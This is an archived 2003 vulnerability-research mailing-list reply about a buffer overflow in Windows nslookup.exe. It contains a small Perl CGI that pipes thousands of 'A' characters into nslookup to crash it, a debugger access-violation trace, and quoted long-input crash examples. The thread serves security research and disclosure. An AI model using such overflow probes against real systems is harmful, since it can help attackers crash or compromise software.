Vulnerability Development mailing list archives

Re: NSLOOKUP.EXE

From: Ryan Yagatich <ryany () pantek com>
Date: Fri, 21 Mar 2003 12:04:49 -0500 (EST)



==begin silly.cgi

#!perl -w

use strict;
print "Content-type: text/html\n\n";

open(NSLOOKUP,"|nslookup.exe") || die "Could not open nslookup.exe (path?)";
        print NSLOOKUP "A" x 6489;
close(NSLOOKUP);

==end silly.cgi

MSDE:
Unhandled exception at 0x01004d65 in NSLOOKUP.EXE: 0xC0000005: Access 
violation writing location 0x0103e000.

     01004D5D  cmp         esi,100F770h 
     01004D63  je          01004D6F 
---> 01004D65  mov         dword ptr [edi],esi 
     01004D67  add         edi,4 
     01004D6A  jmp         01004C37 


01004D65 = 16797029

,_____________________________________________________,
\ Ryan Yagatich                     support () pantek com \
/ Pantek Incorporated                  (877) LINUX-FIX /
\ http://www.pantek.com/security        (440) 519-1802 \
/       Are your networks secure? Are you certain?     /
\___A4536371BF88C57DB181799D00BCA331E6AD909D297C3493___\

On Thu, 20 Mar 2003, Blue Boar wrote:

Patrick Webster wrote:

Can you do anything interesting with this?:

C:\>nslookup
Default Server:  dns.server.net
Address:  111.222.333.444

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA


AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Gives error: memory can't be "read" - 0x414141 (aka A).


If you have to manually type all the A's, then probably not.  Maybe if 
someone did something silly like make a CGI script that calls nslookup.exe 
directly with user input.

What OS are you testing on?  It looks like it's fixed in XP:

C:\winxp\system32>nslookup
Default Server:  dns1.snfcca.sbcglobal.net
Address:  206.13.28.12

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
*** Input is too long

BB

Current thread:

NSLOOKUP.EXE Patrick Webster (Mar 20)
- Re: NSLOOKUP.EXE Blue Boar (Mar 20)
  - RE: NSLOOKUP.EXE Brett Moore (Mar 21)
  - Re: NSLOOKUP.EXE Ryan Yagatich (Mar 21)
- Re: NSLOOKUP.EXE K. K. Mookhey (Mar 23)
  - RE: NSLOOKUP.EXE Brett Moore (Mar 23)
  - Re: NSLOOKUP.EXE Marcos D. Marado Torres (Mar 24)
- <Possible follow-ups>
- RE: NSLOOKUP.EXE Patrick Webster (Mar 20)
  - RES: NSLOOKUP.EXE Cleber P. de Souza (Mar 21)
  - Re: NSLOOKUP.EXE Nexus (Mar 21)
- RE: NSLOOKUP.EXE Sillari Andrea (Mar 21)
- Re: NSLOOKUP.EXE Filip Maertens (Mar 21)
- Re: NSLOOKUP.EXE Chris Calabrese (Mar 21)
- Re: NSLOOKUP.EXE Mysq (Mar 21)